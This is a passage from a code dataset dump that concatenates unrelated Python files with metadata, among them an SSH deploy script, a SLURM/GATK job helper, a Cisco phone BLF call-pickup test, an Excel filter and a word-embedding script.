print('\\033[1;37;45m ERROR:',tb,' 配置文件检查错误 \\033[0m')\n else:\n print('检测通过:',tb)\n ssh.upload(confs.main_path+'cfg/'+tb+'.properties',confs.remote_path+'cfg/'+tb+'.properties')\n ssh.upload(confs.main_path+'sql/'+tb+'.sql',confs.remote_path+'sql/'+tb+'.sql')\n tar_cmd=confs.hive_sh+tb+'.sql'\n #print('执行数据同步完成')\n if ssh.cmd_run([tar_cmd])>0:\n print('执行成功')\n else:\n print('\\033[1;37;45m ERROR:',tb,' sql执行错误,请修改 \\033[0m')\n ssh.close() \nif __name__ == '__main__': \n auto=auto_schedule()\n auto.auto_deploy(tar_ssh='ssh_sc')\n #auto.run_sql(tb='dim_cust_base_info_daily',tar_ssh='ssh_sc')\n ","sub_path":"myworks/auto_schedule.py","file_name":"auto_schedule.py","file_ext":"py","file_size_in_byte":22945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"58470930","text":"## -*- coding: utf-8 -*-\n#\"\"\"\n#Spyder Editor\n#\n#This is a temporary script file.\n#\"\"\"\n#\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport csv\n#from csvGenerator import update\nimport itertools\n#from client import fnamedump\n\n#style.use('fivethirteight')\nSTEP = 100\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n#ax1.set_aspect('equal', 'datalim')\nax1.set_xlabel('Time Stamp')\nax1.set_ylabel('Current (mA)')\n\nbegin = 5\nend = STEP\n\ndef readRow():\n \n global begin, end\n \n with open('teststand_2016-09-27T14-29-28.693000.csv', 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=';')\n x = []\n y = []\n for row in itertools.islice(reader, begin, end):\n x.append(float(row[0]) / 1000.0)\n y.append(row[25])\n \n begin = reader.line_num - 1\n end = begin + STEP\n \n return x, y \n\ndef animate(i):\n \n x, y = readRow()\n ax1.plot(x, y, 'r-')\n\n# x,y = update()\n# ax1.plot(x, y, 'r-')\n\nif __name__=='__main__':\n \n# try:\n# while True:\n# x,y = update()\n# print(x)\n# except KeyboardInterrupt: \n# pass\n \n ani = animation.FuncAnimation(fig, animate, interval=1000)\n plt.show()","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"34338791","text":"from .. import models\n\n\nclass TestModels:\n\n def test_tweet_object_id_content(self, db_session):\n tweet = models.Tweet(content=\"Test content\")\n db_session.add(tweet)\n db_session.commit()\n assert str(tweet) == \"{0}. {1}\".format(1, \"Test content\")\n\n def test_tag_object_id_tagname(self, db_session):\n tag = models.Tag(tag=\"test_tag\")\n db_session.add(tag)\n db_session.commit()\n assert str(tag) == \"{0}. 
{1}\".format(1, \"test_tag\")\n","sub_path":"grpc_service/database/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"430555553","text":"import os\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"HFA\")\n\n# ----------------------------------------------------------------------\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\n#process.MessageLogger.cerr.FwkReport.reportEvery = 1000\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\n\n\n# ----------------------------------------------------------------------\n# -- Database configuration\nprocess.load(\"CondCore.DBCommon.CondDBCommon_cfi\")\nprocess.load(\"CondCore.DBCommon.CondDBSetup_cfi\")\n\n# -- Conditions\nprocess.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\nprocess.load(\"Configuration.Geometry.GeometryIdeal_cff\")\nprocess.load(\"RecoVertex.BeamSpotProducer.BeamSpot_cfi\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = \"GR_P_V43D::All\"\n\n# ----------------------------------------------------------------------\n# -- Input files\n\nprocess.source = cms.Source(\"PoolSource\",\n skipEvents = cms.untracked.uint32(0),\n fileNames = cms.untracked.vstring(\n 'file:/usr/rmt_share/scratch96/w/wxie/2A54599E-DB74-E211-9D29-5404A63886AD.root'\n )\n )\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(1000)\n )\n\nrootFileName = \"dpm.root\"\n\nprocess.tree = cms.EDAnalyzer(\n \"HFTree\",\n verbose = cms.untracked.int32(1),\n printFrequency = cms.untracked.int32(1000),\n fileName = cms.untracked.string(rootFileName),\n requireCand = cms.untracked.bool(True)\n )\n\n# ----------------------------------------------------------------------\nprocess.load(\"Configuration.StandardSequences.Reconstruction_cff\")\nprocess.load(\"UserCode.OpenHF.HFRecoStuff_cff\")\nprocess.load(\"UserCode.OpenHF.HFCharm_cff\")\n\n# ----------------------------------------------------------------------\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('dpm.root')\n )\n\n# ----------------------------------------------------------------------\nprocess.p = cms.Path(\n process.recoStuffSequence*\n process.dpmSequence*\n process.tree\n)\n\n","sub_path":"OpenHF/test/dpm.py","file_name":"dpm.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"652575899","text":"import os\nfrom os.path import dirname\nfrom textx import metamodel_from_file\nfrom textx.export import metamodel_export, model_export\nfrom textx.model import pprint_tree\nfrom drawingPrinter import init_drawing_printer\n\nTHIS_FOLDER = dirname(__file__)\n\ndef main(debug=False):\n mm = metamodel_from_file('drawing.tx', debug=debug)\n proba_model = mm.model_from_file('drawingExample.txt')\n export_dot(mm, proba_model)\n\n print('\\n\\nORIGINAL:\\n\\n')\n printer = init_drawing_printer()\n printer.pprint_model(proba_model)\n\n # refactor_model_extract_method(proba_model, mm)\n # refactor_model_change_order(proba_model)\n\n # print('\\n\\nREFACTORED:\\n\\n')\n # printer.pprint_model(proba_model)\n\ndef refactor_model_change_order(model):\n model.functions.reverse()\n 
model._tx_pprint_data.reverse()\n\ndef refactor_model_extract_method(model, metamodel):\n existing_function = model.functions[0]\n \n # Create a new Function instance\n function_metaclass = existing_function.__class__\n new_function = function_metaclass.__new__(function_metaclass)\n metamodel._init_obj_attrs(new_function)\n \n # Set a name and arguments for the new function\n new_function.args = ['x', 'y', 'radius1', 'radius2']\n new_function.name = 'print_circles'\n\n # Add 2 statements from the existing function to the new function\n new_function.statements = [existing_function.statements[4], existing_function.statements[5]]\n\n # Add the new function to the model\n model.functions.append(new_function)\n model._tx_pprint_data.append(new_function)\n\n # Create a function call for the new function\n function_call_metaclass = metamodel.__getitem__('FunctionCall')\n new_function_call = function_call_metaclass.__new__(function_call_metaclass)\n metamodel._init_obj_attrs(new_function_call)\n\n new_function_call.name = new_function.name\n new_function_call.args = new_function.args\n new_function_call.whitespaces_before = existing_function._tx_pprint_data[16]._tx_pprint_data[0].layout_before\n\n # Remove the statements from the existing function and replace them with the function call\n existing_function.statements[4] = new_function_call\n existing_function.statements.pop(5)\n existing_function._tx_pprint_data.pop(16)\n existing_function._tx_pprint_data.pop(16)\n existing_function._tx_pprint_data.pop(16)\n existing_function._tx_pprint_data.insert(16, new_function_call)\n\n\ndef export_dot(mm, model):\n metamodel_export(mm, 'metamodel.dot')\n model_export(model, 'model.dot')\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"drawing/drawingTest.py","file_name":"drawingTest.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"358672159","text":"### FIX\n# at some point, have the jobID/mem as an input arg instead of scripted\n###\n\n###\n# usage: gvcf_helper.py /path/to/fastq.gz/folder/\n\n###\n# purpose: to keep running gatk commands until time or memory runs out\n###\n\n### imports\nimport sys\nimport os\nfrom os import path as op\nfrom os import listdir\nimport pickle\nimport shutil\nfrom random import shuffle\ndef ls(DIR):\n return sorted([f for f in listdir(DIR)])\ndef fs (DIR):\n return sorted([op.join(DIR,f) for f in ls(DIR)])\n###\n\n### args\nthisfile, fqdir = sys.argv\n###\n\nos.system('source $HOME/.bashrc')\nDIR = op.join(op.dirname(fqdir),'shfiles/gvcf_shfiles')\nos.chdir(DIR)\nworkingdir = op.join(DIR,'workingdir')\nif not op.exists(workingdir):\n os.makedirs(workingdir)\n \n# get job info and current memory/time limits\njobid = os.popen('echo ${SLURM_JOB_ID}').read().replace(\"\\n\",\"\")\n#print('jobid=',jobid)\njobinfo = os.popen(\"sacct -j %s | grep 'lindb'\" % jobid).read()\n#print('jobinfo=',jobinfo)\njobmem = int([x for x in jobinfo.split() if 'mem' in x][0].split(\",\")[1].split('=')[1].replace(\"M\",\"\"))\n#print('jobmem=',jobmem)\ntimeinfo = os.popen(\"sacct -j %s --format Timelimit\" % jobid).read()\n#print('timeinfo=',timeinfo)\njobtime = int(timeinfo.split()[-1].split(':')[0])\n#print('jobtime=',jobtime)\n\n# get list of remaining gatk calls\nshfiles = [f for f in fs(DIR) if f.endswith('.sh')]\nshuffle(shfiles) \n\n# run commands until I run out of time\nos.system('echo running gvcf_helper.py')\nif len(shfiles) > 0:\n for s in shfiles:\n # print (s)\n reservation = 
op.join(workingdir,op.basename(s))\n if op.exists(s):\n try:\n shutil.move(s,reservation) # so that other jobs don't rewrite\n except:\n os.system('echo could not move shfile %s' % s)\n os.system('echo to reservation %s' % reservation)\n continue\n os.system('echo %s' % reservation)\n \n with open(reservation,'r') as O:\n o = O.readlines()\n\n # only continue to run jobs that fit in the same memory allocation (don't waste resources if it's going to fail)\n mem = int([x for x in o if 'mem' in x][0].split(\"=\")[1].replace(\"M\\n\",\"\"))\n if mem > jobmem:\n os.system('echo file exceeds mem limit')\n shutil.move(reservation,s) # put the job back in the queue\n continue\n # only continue to run jobs that might fit in same time allocation\n TIME = int([x for x in o if 'time' in x][0].split(\"=\")[1].split(':')[0])\n if TIME > jobtime:\n os.system('echo file exceeds necessary time')\n shutil.move(reservation,s)\n continue\n\n\n os.system('echo file is ok to proceed')\n for line in o:\n if line.startswith('gatk'):\n cmd = line.replace('\\n','')\n os.system('echo running cmd:')\n os.system('echo %s' % cmd)\n os.system('%s' % cmd)\n try:\n os.unlink(reservation)\n os.system('echo unlinked shfile %s' % reservation)\n except:\n os.system('echo unable to unlink %s' % reservation)\n pass\n pipedir = os.popen('echo $HOME/pipeline').read().replace(\"\\n\",\"\")\n os.system('python %s %s' % (op.join(pipedir,'rescheduler.py'),\n fqdir))\n os.system('python %s %s' % (op.join(pipedir,'scheduler.py'),\n fqdir))\n\n break\nelse:\n os.system('echo no files to help')\n \n \n \n ","sub_path":"pipeline/gvcf_helper.py","file_name":"gvcf_helper.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"298953417","text":"class Node:\n def __init__(self, val):\n self.key = val\n self.left = None\n self.right = None\n\n\ndef print_tree(node):\n if node is None:\n return\n print_tree(node.left)\n print(node.key)\n print_tree(node.right)\n\n\ndef main():\n root = Node(18)\n root.left = Node(12)\n root.left.left = Node(7)\n root.left.right = Node(4)\n root.left.right.left = Node(5)\n root.right = Node(10)\n root.right.left = Node(2)\n root.right.right = Node(21)\n print_tree(root)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"10_4_2_print_tree_recursive.py","file_name":"10_4_2_print_tree_recursive.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"235208136","text":"def file_write(file_path, data):\n \"\"\"\n Write data in the file specified at file_path\n\n :param file_path: the location of the file\n :param data: the data to write\n :return: nothing\n \"\"\"\n with open(file_path, 'w') as output_file:\n if not isinstance(data, str):\n data = str(data)\n output_file.write(data)\n return\n","sub_path":"algorithms/file/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"268878208","text":"import re\nimport sys\nfrom datetime import date\nfrom xlrd import open_workbook,xldate_as_tuple\nfrom xlwt import Workbook\ninput_file = sys.argv[1] # here: sales_2013.xlsx\noutput_file = sys.argv[2] # here: 6output.xls\noutput_workbook = Workbook()\noutput_worksheet = output_workbook.add_sheet('jan_2013_output')\npattern = re.compile(r'(?P<my_pattern_group>^J.*)') # the key part of this pattern is ^J.*: it matches from the start of the string, and J may be followed by any number of characters
\ncustomer_name_column_index = 1\n\"\"\"\nThe logic of the code below is very similar to before: open the file, inspect it cell by cell, and pull out the row whenever it meets the condition\n\"\"\"\nwith open_workbook(input_file) as workbook:\n\tworksheet = workbook.sheet_by_name('january_2013')\n\tdata = []\n\theader = worksheet.row_values(0)\n\tdata.append(header)\n\tfor row_index in range(1,worksheet.nrows):\n\t\trow_list = []\n\t\tif pattern.search(worksheet.cell_value(row_index, customer_name_column_index)):\n\t\t\tfor column_index in range(worksheet.ncols):\n\t\t\t\tcell_value = worksheet.cell_value(row_index, column_index)\n\t\t\t\tcell_type = worksheet.cell_type(row_index, column_index)\n\t\t\t\tif cell_type == 3:\n\t\t\t\t\tdate_cell = xldate_as_tuple(cell_value, workbook.datemode)\n\t\t\t\t\tdate_cell = date(*date_cell[0:3]).strftime('%m/%d/%Y')\n\t\t\t\t\trow_list.append(date_cell)\n\t\t\t\telse:\n\t\t\t\t\trow_list.append(cell_value)\n\t\tif row_list:\n\t\t\tdata.append(row_list)\n\tfor list_index,output_list in enumerate(data):\n\t\tfor element_index,element in enumerate(output_list):\n\t\t\toutput_worksheet.write(list_index,element_index,element)\noutput_workbook.save(output_file)","sub_path":"第 3 章所需资料/6excel_value_matches_pattern.py","file_name":"6excel_value_matches_pattern.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"594862933","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id:cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nName:\n cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber.py\n\nPurpose:\n To test if the caller number is displayed correctly (without star code) for\n BLF call pickup\n\nAuthor:\n Anuradha N(anakre@cisco.com)\n\nReferences:\n CSCva92839\n US23986\n\nDescription:\n Configure BLF - speed dial in the monitoring phone from the 'Extended\n Function' field in Phone tab. Call monitored user from Phone C and then\n try call pickup from monitoring user by pressing line key for monitored\n user. Check for call state and blf state. And also verify if the caller\n number is displayed without star code on LCD.\n\nTopology:\n 1. 3 3pcc phones.\n 2. All the phones should register successfully before running the script\n 3. BLF should be configured on monitoring user phone.\n\nPass/Fail Criteria:\n 1. Monitoring should be able to initiate call pickup by pressing the line\n key corresponding to the monitored user which is in ringing state.\n 2. After initiating call pickup proper name and number should be\n displayed in the Monitoring phone\n\nTest Steps:\n 1. Create a blf list uri and add monitored users in the BS server.\n 2. Disable extension 2 of DUT from phone webpage and set the blf\n function in the 'Extended Function' field for Line Key 2.\n syntax = fnc=blf+cp;sub=blf_listuriname@$PROXY;usr=monitored_userid\n @$PROXY\n 3. Then dial from Phone C to the monitored user (Phone B)\n 4. Do not answer the call\n 5. Check if the BLF state of Phone B in DUT is set to ALERTING\n 6. Initiate call pick up from DUT(Phone A) by pressing the line key\n corresponding to the monitored user.\n 7. Phone B stops ringing and Phone A and Phone C are connected\n 8. Check that LCD displays the Phone C name and number. (without star code)\n 9. Check that blf state in DUT for Phone B is shown as IDLE\n 10. 
Disconnect the call and verify that all phones are idle\n\nNotes:\n\nKnown Bugs:\n\n\"\"\"\nimport tng\nimport logging\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nfrom tng.api import concurrent\nfrom tng_sl.device.endpoint.synergylite.synergylite_3pcc_extended \\\n import wait_for_ccapi_call_states, register_lines, poll_feature_state\nfrom tng.frontend.timing import wait\nfrom tng_sl.contrib.setup_helper import SetupHelpersTestCase\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneLineRegHelper\nfrom tng_sl.contrib.mpp.phone_line_reg_helper import PhoneConfigHelper\n\nfrom tng_sl.contrib.mpp.broadsoft.BroadsoftWebToolkit\\\n import BroadsoftWebToolkit\nfrom tng_sl.plugins.synergylite_3pcc_ui import SynergyLite3pccUiHelper\n\nlog = logging.getLogger('BlfCallPickup')\n\n\nclass BlfCallPickup(SetupHelpersTestCase, tng.api.TestCase):\n\n helpers = (PhoneConfigHelper, PhoneLineRegHelper)\n helper_num_devices = 3\n\n @classmethod\n def setUpClass(cls):\n log.info(\"Start of setUpClass\")\n\n cls.proxy = cls.phone_data['proxy']\n\n log.info(\"Enable busy lamp field in the server\")\n bsoft_data = cls.toolkit.get_test_env_info(\n section='bsoft')\n bsoft_url = bsoft_data['web_url']\n cls.bsoft_web = BroadsoftWebToolkit(bsoft_url)\n cls.bsoft_ip_addr = bsoft_data['as_ip_addr']\n group_admin = bsoft_data['group_admin_id1']\n pswd = bsoft_data['group_admin_password1']\n cls.bsoft_web.login(group_admin, pswd)\n cls.blf_list_uri = cls.bsoft_web.create_blf_listuri(\n cls.user_id1, [cls.user_id2], cls.proxy)\n cls.bsoft_user_id2 = cls.bsoft_web.get_user_id(\n 'group admin', cls.user_id2)\n cls.p2_fname, cls.p2_lname = cls.bsoft_web.get_first_and_last_name(\n account_type=\"group admin\", user_phone_num=cls.user_id3)\n\n def delete_blf_list():\n cls.bsoft_web.delete_blf_listuri(cls.user_id1)\n cls.bsoft_web.close_web_page()\n\n cls.addCleanupClass(delete_blf_list)\n\n log.info(\"End of setUpClass\")\n\n def test_blf_callpickup_ext_function(self):\n\n log.info(\"Start of test_blf_callpickup_ext_function\")\n\n linenum = self.oPhone1.get_phone_line_total_number()\n if linenum <= 1:\n self.skipTest(\"Phone only has one line, it can't be set BLF\")\n\n log.info(\"Set blf callpickup function in the extended function field\")\n uri_name = '{}@{}'.format(self.blf_list_uri, self.proxy)\n blf_fnc = 'fnc=blf+sd+cp;sub={};usr={}@{}'.format(\n uri_name, self.bsoft_user_id2, self.proxy)\n\n self.oPhone1.ui.set_web_parameter_by_resync(\n Ext_Func_2=['Extended_Function_2_', blf_fnc],\n Extension_2=['Extension_2_', 'Disabled'])\n\n config_parm1 = self.oPhone1.get_web_config(\n 'Extended_Function_2_', 'Extension_2_')\n\n self.assertEqual(\n config_parm1[0], blf_fnc,\n \"BLF function not set in Extended function field\")\n self.assertEqual(\n config_parm1[1], \"Disabled\", \"Extension 2 is not disabled\")\n caller_name = '{} {}'.format(self.p2_fname, self.p2_lname)\n\n self.oPhone1.register_call_event('VOIP_MSG_CALL_EVENT_SHARE')\n self.oPhone1.ccapi.feedback_subscribe(self.oPhone1.subscribed_callback)\n log.info(\"Phone C dials Phone B's number\".format(self.user_id2))\n self.oPhone3.ccapi.dial('null', self.user_id2, '', 1, 0, 1)\n\n # check phoneC ringout status and PhoneB ringing status\n wait_for_ccapi_call_states(\n self.devices, (\"IDLE\", \"RINGING\", \"PROCEEDING\"), timeout=20)\n # check BLF State Alerting on Phone A\n poll_feature_state(\n self.oPhone1, 2, ['State'], expected_state=['ALERTING'])\n\n log.info(\"Phone A press the line key to initiate call pick up\")\n 
self.oPhone1.ccapi.sendKey(SynergyLite3pccUiHelper.PK_LN2, 1, '0000')\n # check phoneA and PhoneC connected status\n wait_for_ccapi_call_states(\n self.devices, (\"CONNECTED\", \"IDLE\", \"CONNECTED\"), timeout=20)\n # check BLF State IDLE on Phone A\n poll_feature_state(self.oPhone1, 2, ['State'], expected_state=['IDLE'])\n\n call_name = self.oPhone1.ui.get_param_value('Peer Name')\n call_num = self.oPhone1.ui.get_param_value('Peer Phone')\n self.assertEqual(caller_name, call_name)\n self.assertEqual(self.user_id3[-4:], call_num)\n\n self.oPhone1.ccapi.feedback_unsubscribe(\n self.oPhone1.subscribed_callback)\n wait(10, 'Wait for 10s when phones are in connected state')\n\n log.info(\"Phone C ends the call\")\n self.oPhone3.ccapi.hangUp('0000')\n # check IDLE status for all phones\n wait_for_ccapi_call_states(\n self.devices, (\"IDLE\", \"IDLE\", \"IDLE\"), timeout=20)\n # check BLF State IDLE on Phone A\n poll_feature_state(self.oPhone1, 2, ['State'], expected_state=['IDLE'])\n self.oPhone1.unregister_call_event('VOIP_MSG_CALL_EVENT_SHARE')\n\n\n# this is called by 'tng run'\ndef main():\n tng.api.runner()\n\nif __name__ == '__main__':\n tng.run(main)\n","sub_path":"common/CFD/call_control/cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber.py","file_name":"cmCC23986_3pcc_BLF_CallPickup_StarCode_CallerNumber.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"493819197","text":"#!/bin/python\n\nimport sys\n\ndef birthdayCakeCandles(n, ar):\n maximum = None\n n_maximum = 0\n\n # Keep track of the maximum number and the number of times it has appeared\n for number in ar:\n if not maximum or number > maximum:\n maximum = number\n n_maximum = 1\n elif maximum == number:\n n_maximum = n_maximum + 1\n\n return n_maximum\n\nn = int(raw_input().strip())\nar = map(int, raw_input().strip().split(' '))\n\nresult = birthdayCakeCandles(n, ar)\nprint(result)\n","sub_path":"warmup/birthday-cake-candles.py","file_name":"birthday-cake-candles.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"172682792","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2019/10/30 5:25 PM\n# @Author : Aries\n# @Site : \n# @File : document_emebedding.py\n# @Software: PyCharm\n'''Classify documents'''\n\nfrom __future__ import print_function\nimport collections\nimport csv\nimport math\nimport numpy as np\nimport os\nimport random\nimport tensorflow as tf\nimport zipfile\nfrom matplotlib import pylab\nfrom six.moves import range\nfrom six.moves.urllib.request import urlretrieve\nfrom sklearn.manifold import TSNE\nfrom sklearn.cluster import KMeans\nimport nltk # standard preprocessing\nimport operator # sorting items in dictionary by value\n# nltk.download() #tokenizers/punkt/PY3/english.pickle\nfrom math import ceil\n\nfile = \"/Users/houruixiang/python/tensorflow_nlp_master/Senior_Word2vec/dataset/bbc-fulltext.zip\"\n# nltk.download('punkt')\nvocabulary_size = 25000 # the vocabulary contains 25000 words\ndata_index = 0\ntest_data_index = 0\n\n\ndef read_data(file):\n\tdata = []\n\tfiles_to_read_for_topic = 250\n\ttopics = ['business', 'entertainment', 'politics', 'sport', 'tech']\n\twith zipfile.ZipFile(file=file) as f:\n\t\tparent_dir = f.namelist()[0]\n\t\t# iterate over the topics\n\t\tfor t in topics:\n\t\t\tprint('\\tFinished reading data for topic: ', t)\n\t\t\t# iterate over the documents\n\t\t\tfor fi in range(1, files_to_read_for_topic):\n\t\t\t\twith f.open(parent_dir + t + '/' 
+ format(fi, '03d') + '.txt') as f2:\n\t\t\t\t\tfile_string = f2.read().decode('latin-1')\n\t\t\t\t\tfile_string = file_string.lower()\n\t\t\t\t\tfile_string = nltk.word_tokenize(file_string)\n\t\t\t\t\tdata.extend(file_string)\n\t\t# 12250\n\t\treturn data\n\n\ndef read_test_data(file):\n\ttest_data = {}\n\tfiles_to_read_for_topic = 250\n\ttopics = ['business', 'entertainment', 'politics', 'sport', 'tech']\n\twith zipfile.ZipFile(file=file) as f:\n\t\tparent_dir = f.namelist()[0]\n\t\tfor t in topics:\n\t\t\tprint('\\tFinished reading data for topic: ', t)\n\t\t\tfor fi in np.random.randint(1, files_to_read_for_topic, (10)).tolist():\n\t\t\t\twith f.open(parent_dir + t + '/' + format(fi, '03d') + '.txt') as f2:\n\t\t\t\t\tfile_string = f2.read().decode('latin-1')\n\t\t\t\t\tfile_string = file_string.lower()\n\t\t\t\t\tfile_string = nltk.word_tokenize(file_string)\n\t\t\t\t\ttest_data[t + '_' + str(fi)] = file_string\n\t\t# 50\n\t\treturn test_data\n\n\ndef build_dataset(words):\n\t'''\n\tcreate a dict:\n\t1.maps a string word to an ID & maps an ID to a string word\n\t2.List of list of (word,frequency)elements(eg.[(I,1),(to,2)...])\n\t3.Contain the string of text we read,where string words are replaced with word IDs\n\t:param words:\n\t:return:\n\t\tdata: list [[id]]\n\t\tcount: list [[word,freq]]\n\t\tdictionary: dict [[word,id]]\n\t\treverse_dictionary [[id,word]]\n\t'''\n\tcount = [['UNK', -1]]\n\t# collections.Counter(words) counts the word frequencies in words\n\t# .most_common(vocabulary_size - 1) returns the 25000 most frequent words after sorting\n\tcount.extend(collections.Counter(words).most_common(vocabulary_size - 1)) # 25000\n\t\n\t# build a fast lookup table\n\tdictionary = dict()\n\tfor word, _ in count:\n\t\tdictionary[word] = len(dictionary)\n\t\n\tdata = list()\n\tunk_count = 0\n\tfor word in words:\n\t\tif word in dictionary:\n\t\t\tindex = dictionary[word]\n\t\telse:\n\t\t\t# dictionary['UNK']\n\t\t\tindex = 0\n\t\t\tunk_count = unk_count + 1\n\t\tdata.append(index)\n\t\n\t# update the count variable with the number of UNK occurrences\n\tcount[0][1] = unk_count\n\treverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n\treturn data, count, dictionary, reverse_dictionary\n\n\ndef build_dataset_with_existing_dictionary(words, dictionary):\n\t'''\n\t\n\t:param words:\n\t:param dictionary:\n\t:return:\n\t'''\n\tdata = list()\n\tfor word in words:\n\t\tif word in dictionary:\n\t\t\tindex = dictionary[word]\n\t\telse:\n\t\t\tindex = 0\n\t\tdata.append(index)\n\treturn data\n\n\n'''Generating Batches of Data for Skip-Gram'''\n\n\ndef generate_batch(data, batch_size, window_size):\n\t# window_size is the amount of words we're looking at from each side of a given word\n\t# creates a single batch\n\t\n\t# data_index is updated by 1 every time we read a set of data points\n\tglobal data_index\n\t\n\t# span defines the total window size, where\n\t# data we consider at an instance looks as follows.\n\t# [ skip_window target skip_window ]\n\t# e.g if skip_window = 2 then span = 5\n\tspan = 2 * window_size + 1 # [ skip_window target skip_window ]\n\t\n\t# two numpy arrays to hold target words (batch)\n\t# and context words (labels)\n\t# Note that batch has span-1=2*window_size columns\n\tbatch = np.ndarray(shape=(batch_size, span - 1), dtype=np.int32)\n\tlabels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)\n\t\n\t# The buffer holds the data contained within the span\n\tbuffer = collections.deque(maxlen=span)\n\t\n\t# Fill the buffer and update the data_index\n\t# initially fill the buffer\n\tfor _ in 
range(span):\n\t\tbuffer.append(data[data_index])\n\t\tdata_index = (data_index + 1) % len(data)\n\t\n\tnum_samples = 2 * window_size\n\t# Here we do the batch reading\n\t# We iterate through each batch index\n\t# For each batch index, we iterate through span elements\n\t# to fill in the columns of batch array\n\tfor i in range(batch_size):\n\t\tk = 0\n\t\t# avoid the target word itself as a prediction\n\t\t# fill in batch and label numpy arrays\n\t\tfor j in range(span):\n\t\t\tif j == span // 2:\n\t\t\t\tcontinue\n\t\t\tbatch[i, k] = buffer[j]\n\t\t\tk += 1\n\t\tlabels[i, 0] = buffer[window_size]\n\t\t\n\t\t# Every time we read num_samples data points,\n\t\t# we have created the maximum number of datapoints possible\n\t\t# within a single span, so we need to move the span by 1\n\t\t# to create a fresh new span\n\t\tbuffer.append(data[data_index])\n\t\tdata_index = (data_index + 1) % len(data)\n\t\n\tassert batch.shape[0] == batch_size and batch.shape[1] == span - 1\n\treturn batch, labels\n\n\ndef generate_test_batch(data, batch_size):\n\tglobal test_data_index\n\tbatch = np.ndarray(shape=(batch_size), dtype=np.int32)\n\ttry:\n\t\tfor bi in range(batch_size):\n\t\t\tbatch[bi] = data[test_data_index]\n\t\t\ttest_data_index = (test_data_index + 1) % len(data)\n\texcept:\n\t\ts = 10\n\treturn batch\n\n\ndef plot(embeddings, labels):\n\tn_clusters = 5 # number of clusters\n\t\n\t# automatically build a discrete set of colors, each for cluster\n\t# 0-o 1-^ 2-d 3-s 4-x\n\tlabel_markers = ['o', '^', 'd', 's', 'x']\n\t# make sure the number of document embeddings is same as\n\t# point labels provided\n\tassert embeddings.shape[0] >= len(labels), 'More labels than embeddings'\n\t\n\tpylab.figure(figsize=(15, 15)) # in inches\n\t\n\tdef get_label_id_from_key(key):\n\t\t'''\n\t\tWe assign each different category a cluster_id\n\t\tThis is assigned based on what is contained in the point label\n\t\tNot the actual clustering results\n\t\t'''\n\t\tif 'business' in key:\n\t\t\treturn 0\n\t\telif 'entertainment' in key:\n\t\t\treturn 1\n\t\telif 'politics' in key:\n\t\t\treturn 2\n\t\telif 'sport' in key:\n\t\t\treturn 3\n\t\telif 'tech' in key:\n\t\t\treturn 4\n\t\n\t# Plot all the document embeddings and their corresponding words\n\tfor i, label in enumerate(labels):\n\t\tx, y = embeddings[i, :]\n\t\tpylab.scatter(x, y, s=50,\n\t\t marker=label_markers[get_label_id_from_key(label)])\n\t\t\n\t\t# Annotate each point on the scatter plot\n\t\tpylab.annotate(label, xy=(x, y), xytext=(5, 2), textcoords='offset points',\n\t\t ha='right', va='bottom', fontsize=16)\n\t\n\t# Set plot title\n\tpylab.title('Document Embeddings visualized with t-SNE', fontsize=24)\n\t\n\t# Use for saving the figure if needed\n\tpylab.savefig('./dataset/document_embeddings.png')\n\tpylab.show()\n\n\ndef main():\n\tprint('Processing training data...')\n\twords = read_data(file)\n\tprint('\\nProcessing testing data...')\n\ttest_words = read_test_data(file)\n\t\n\tdata, count, dictionary, reverse_dictionary = build_dataset(words)\n\ttest_data = {}\n\tfor k, v in test_words.items():\n\t\tprint('Building Test Dataset for ', k, ' 